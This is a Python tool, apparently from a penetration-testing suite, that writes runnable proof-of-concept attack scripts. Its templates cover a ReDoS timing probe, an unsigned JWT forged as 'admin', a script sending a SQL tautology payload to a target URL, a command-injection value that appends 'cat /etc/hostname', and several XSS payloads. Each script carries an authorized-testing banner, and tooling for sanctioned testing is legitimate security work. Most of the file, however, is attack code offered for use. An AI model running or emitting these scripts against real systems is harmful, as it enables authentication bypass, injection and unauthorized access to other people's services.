#!/usr/bin/env python3
"""PoC Writer 4.2 -- Owen turns confirmed findings into runnable attack code.

Boundaries (house contract):
- Generated scripts are OFFENSE ARTIFACTS for authorized testing only; every
  emitted file carries that warning in its header and a TARGET constant the
  operator must set deliberately.
- Generation works from Attestor's own finding kinds; nothing is executed at
  generation time. Running a generated script against any target is the
  operator's action and responsibility.
- Exit codes: 0 written, 1 nothing matched, 2 usage, 4 operational failure.
"""

from __future__ import annotations

import argparse
import hashlib
import json
import sys
from pathlib import Path

PW_SCHEMA = "attestor-poc-writer-4.2"
EXIT_WRITTEN = 0
EXIT_NO_MATCH = 1
EXIT_INVALID = 2
EXIT_OPERATIONAL = 4


class PwError(ValueError):
    pass


def canonical_json(obj) -> str:
    return json.dumps(obj, sort_keys=True, separators=(",", ":"))


HEADER = '''#!/usr/bin/env python3
# Generated by Attestor PoC Writer 4.2 -- finding {fid} ({kind})
# digest: {digest}
#
# AUTHORIZED TESTING ONLY. Run this solely against systems you own or are
# explicitly permitted to test. Set TARGET below deliberately.
TARGET = {target!r}
'''

READOS_TEMPLATE = HEADER + '''
import re
import time

PATTERN = {pattern!r}
UNIT = {unit_char!r}
SUFFIX = {suffix!r}
LENGTHS = [8, 12, 16, 20]

for n in LENGTHS:
    probe = UNIT * n + SUFFIX
    start = time.perf_counter()
    re.fullmatch(PATTERN, probe)
    elapsed = time.perf_counter() - start
    print(f"len={{n}} {{elapsed*1000:.1f}} ms")
print("Superlinear timing growth demonstrates catastrophic backtracking.")
'''

JWT_NONE_TEMPLATE = HEADER + '''
import base64
import json

def b64u(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

header = b64u(json.dumps({{"alg": "none", "typ": "JWT"}}).encode())
payload = b64u(json.dumps({{"sub": "admin"}}).encode())
forged = header + "." + payload + "."
print("Present this to a misconfigured verifier:")
print(forged)
'''

SQLI_TEMPLATE = HEADER + '''
import sys
import urllib.parse
import urllib.request

PARAM = {param!r}
PAYLOAD = "' OR '1'='1"
url = TARGET.rstrip("/")
data = urllib.parse.urlencode({{PARAM: PAYLOAD}}).encode()
request = urllib.request.Request(url + "?" + data.decode())
try:
    with urllib.request.urlopen(request, timeout=10) as response:
        body = response.read().decode(errors="replace")
        print("status:", response.status)
        print("baseline-vs-tautology diff is your evidence")
except Exception as exc:
    print("request failed:", exc, file=sys.stderr)
'''

CMDI_TEMPLATE = HEADER + '''
PARAM = {param!r}
PAYLOAD = "x; cat /etc/hostname"
print("Send", PARAM, "=", PAYLOAD, "to", TARGET)
print("Extra command execution after the semicolon is your evidence.")
'''

XSS_TEMPLATE = HEADER + '''
CONTEXT = {context!r}
PAYLOADS = {{
    "body-text": "<img src=x onerror=alert(1)>",
    "attribute-double": '" onmouseover="alert(1)',
    "url-attribute-double": "javascript:alert(1)",
    "script-block": "</script><img src=x onerror=alert(1)>",
}}
payload = PAYLOADS.get(CONTEXT, PAYLOADS["body-text"])
print("Inject into", TARGET, "->", payload)
'''

TEMPLATES = {
    "catastrophic-backtracking": {
        "template": READOS_TEMPLATE,
        "required": (),
        "defaults": {"unit_char": "a", "suffix": "!", "pattern": r"(a+)+$"},
    },
    "jwt-none-alg": {
        "template": JWT_NONE_TEMPLATE,
        "required": (),
        "defaults": {},
    },
    "sql-injection-confirmed": {
        "template": SQLI_TEMPLATE,
        "required": ("target",),
        "defaults": {"param": "user"},
    },
    "command-injection-confirmed": {
        "template": CMDI_TEMPLATE,
        "required": ("target",),
        "defaults": {"param": "cmd"},
    },
    "xss-interpolation-point": {
        "template": XSS_TEMPLATE,
        "required": (),
        "defaults": {"context": "body-text"},
    },
}

KIND_ALIASES = {
    "redos": "catastrophic-backtracking",
    "jwt": "jwt-none-alg",
    "sqli": "sql-injection-confirmed",
    "cmdi": "command-injection-confirmed",
    "xss": "xss-interpolation-point",
}


def generate(kind, finding_id="POC-001", **kwargs):
    kind = KIND_ALIASES.get(kind, kind)
    spec = TEMPLATES.get(kind)
    if spec is None:
        raise PwError("unknown finding kind %r (known: %s)"
                      % (kind, ", ".join(sorted(TEMPLATES))))
    values = dict(spec["defaults"])
    for key in spec["required"]:
        if key not in kwargs or not kwargs[key]:
            raise PwError("--%s is required for kind %s"
                          % (key.replace("_", "-"), kind))
        values[key] = kwargs[key]
    for key, val in kwargs.items():
        if val:
            values[key] = val

    digest_input = canonical_json({"kind": kind, "values": values})
    digest = hashlib.sha256(digest_input.encode()).hexdigest()[:32]
    script = spec["template"].format(
        fid=finding_id, kind=kind, digest=digest,
        target=kwargs.get("target") or "SET-ME", **{
            k: v for k, v in values.items() if k != "target"})
    return {"script": script, "digest": digest, "kind": kind}


def generate_from_plan(plan_path):
    plan = json.loads(Path(plan_path).read_text(encoding="utf-8"))
    findings = plan.get("findings") if isinstance(plan, dict) else None
    if not isinstance(findings, list):
        raise PwError('plan needs a "findings" list')
    out = []
    for index, item in enumerate(findings):
        if not isinstance(item, dict):
            continue
        kind = item.get("kind")
        if not kind:
            continue
        out.append(generate(kind, item.get("id", "finding-%d" % index),
                            **{k: v for k, v in item.items()
                               if k not in ("kind", "id")}))
    return out


def main(argv=None):
    parser = argparse.ArgumentParser(
        prog="poc_writer42",
        description="Generate runnable PoC scripts from finding kinds")
    subs = parser.add_subparsers(dest="command", required=True)

    p = subs.add_parser("generate", help="emit one PoC script")
    p.add_argument("--kind", required=True)
    p.add_argument("--out", help="write here instead of stdout")
    p.add_argument("--target")
    p.add_argument("--param")
    p.add_argument("--context")
    p.add_argument("--pattern")

    p = subs.add_parser("from-plan", help="batch-generate from JSON plan")
    p.add_argument("plan")
    p.add_argument("--outdir", required=True)

    parser.add_argument("--format", choices=["text", "json"], default="text")
    args = parser.parse_args(argv)

    try:
        if args.command == "generate":
            result = generate(args.kind, target=args.target,
                              param=args.param, context=args.context,
                              pattern=args.pattern)
            if args.out:
                Path(args.out).write_text(result["script"],
                                          encoding="utf-8")
                result["written_to"] = args.out
                print(result["script"])
                return EXIT_WRITTEN
            print(result["script"])
            return EXIT_WRITTEN
        if args.command == "from-plan":
            scripts = generate_from_plan(args.plan)
            if not scripts:
                print("poc_writer42: no supported findings in plan",
                      file=sys.stderr)
                return EXIT_NO_MATCH
            outdir = Path(args.outdir)
            outdir.mkdir(parents=True, exist_ok=True)
            for index, item in enumerate(scripts):
                path = outdir / ("poc_%03d_%s.py" % (index, item["kind"]))
                path.write_text(item["script"], encoding="utf-8")
            print(json.dumps({"written": len(scripts),
                              "directory": str(outdir)}, indent=2))
            return EXIT_WRITTEN
    except PwError as exc:
        print("poc_writer42: %s" % exc, file=sys.stderr)
        return EXIT_INVALID
    except OSError as exc:
        print("poc_writer42: %s" % exc, file=sys.stderr)
        return EXIT_OPERATIONAL
    return EXIT_INVALID


if __name__ == "__main__":
    sys.exit(main())
